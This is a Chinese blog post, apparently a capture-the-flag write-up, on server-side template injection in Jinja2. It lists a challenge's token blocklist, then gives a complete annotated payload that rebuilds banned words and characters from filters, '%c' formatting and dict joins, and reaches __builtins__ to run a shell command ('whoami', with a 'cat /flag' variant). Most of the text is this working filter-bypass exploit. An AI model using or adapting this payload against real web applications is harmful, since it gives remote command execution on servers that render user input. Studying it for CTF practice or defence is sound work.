SSTI花活

dasctf做题遇到了一个阴间过滤,于是写了个阴间payload

过滤如下:

blacklist<br>
'.','[','\'','"','\\','+',':','_',<br>
'chr','pop','class','base','mro','init','globals','get',<br>
'eval','exec','os','popen','open','read',<br>
'select','url_for','get_flashed_messages','config','request',<br>
'count','length','0','1','2','3','4','5','6','7','8','9','0','1','2','3','4','5','6','7','8','9'

理论上有更简单的方法，但是我当时并不是很清楚。

# payload分析
# Review note: this listing is the page's evidence that the token denylist above is
# incomplete. Every banned token is rebuilt from primitives the list does not cover:
# digits from filter fallbacks and arithmetic, single characters from "%c" formatting,
# strings from `~` and `dict(...)|join`, attribute access from the `attr` filter.
# The mitigation is not a longer denylist: do not render user-controlled template
# text at all, or at minimum render it with jinja2.sandbox.SandboxedEnvironment,
# which refuses underscore-prefixed attributes however their names are spelled.
# Note that `#` is not a Jinja2 comment (`{# ... #}` is); these annotation lines
# are part of the writeup, not of what would be rendered.
# Digits are banned, so numbers have to be derived.
# `self` is not numeric, so the `int` filter returns its fallback value 0.
{% set zero=(self|int) %}
# 0 ** 0 == 1
{% set one=(zero**zero)|int %}
# '+' is banned: 2 is |0 - 1 - 1| via subtraction and abs.
{%set two=(zero-one-one)|abs %}
# Duplicate of the line above; harmless.
{%set two=(zero-one-one)|abs %}
# One way to obtain a single character: use it as a dict key and read the key back.
{%set c=dict(c=one)|reverse|first %}
# '%' is the first character of the url-encoded string form of `self`.
{% set bfh=self|urlencode|first %}
# "%c" — a format string that turns any code point into its character.
{% set bfhc=bfh~c %}
# The remaining digits, all derived from 2 and 1: 8-3=5, 16-7=9, then 3, 4, 7.
{% set five=(two*two*two)-one-one-one %}
{% set nine=(two*two*two*two-five-one-one) %}
{% set three=five-one-one %}
{% set four=five-one %}
{% set seven=nine-one-one %}
# "%c" % 95 is "_" (xhx = underscore); the banned '_' is thus available.
{% set xhx=bfhc%((nine~five)|int)%}
# A second way to build strings: `aa`/`bb`/`dd` are undefined and only serve as
# values, the dict keys are what join() concatenates ("init", "globals", "items").
{% set ini = dict(ini=aa,t=bb)|join() %}
{% set glo = dict(glo=aa,bals=bb)|join() %}
{% set ite = dict(ite=aa,ms=bb)|join() %}
# Lowest code point of the string form of `self` — intended as a space, per the name.
{% set spa = (self|string|min)%}
# `float` filter falls back to 0.0; the lowest character of "0.0" is "." (pt = point).
{% set pt = (self|float|string|min)%}
# "builtins", "import", "popen", "os", "eval", "read" — each a banned token,
# each assembled from unbanned key fragments.
{% set bu = dict(buil=aa,tins=dd)|join() %}
{% set im = dict(imp=aa,ort=dd)|join() %}
{% set sy = dict(po=aa,pen=bb)|join() %}
{% set ocmd = dict(o=aa,s=bb)|join() %}
{% set ev = dict(ev=aa,al=dd)|join() %}
{% set red = dict(re=aa,ad=dd)|join()%}
# "cat" and "flag"; only used by the commented-out command variant below.
{% set ca = dict(ca=aa,t=dd)|join() %}
{% set flg = dict(fla=aa,g=dd)|join() %}
# Quote, parentheses and slash via "%c": 39 is "'", 40 "(", 41 ")", 47 "/".
{% set yin=bfhc%((three~nine)|int)%}
{% set left = bfhc%((four~zero)|int)%} 
{% set right = bfhc%((four~one)|int)%}
{% set slas = bfhc%((four~seven)|int)%}
# Duplicate of the earlier flg assignment; harmless.
{% set flg = dict(fla=aa,g=dd)|join() %}
# Assemble the command string. The next line is prefixed with '#', but since that
# is not a Jinja2 comment the tag would still run; it is simply overwritten below.
# {% set rce = ca~slas~flg %}
{% set rce = dict(who=aa,ami=dd)|join() %}
# "__builtins__"
{% set bul = xhx~xhx~bu~xhx~xhx %}
# Resolves to __import__('os').popen('whoami').read(): "." comes from pt, quotes from yin.
{% set pld = xhx~xhx~im~xhx~xhx~left~yin~ocmd~yin~right~pt~sy~left~yin~rce~yin~right~pt~red~left~right %}
# Walk self.__init__.__globals__ through the `attr` filter (no '.' or '[' needed),
# locate __builtins__, then its eval, and call it on the assembled string; the
# rendered output is whatever that evaluation returns. For detection, the `attr`
# filter chained on `self` plus "%c" formatting is the signature to look for.
{% for f,v in (self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(ite))() %}{% if f == bul %}{% for a,b in (v|attr(ite))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}

image-20210329211228186

本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!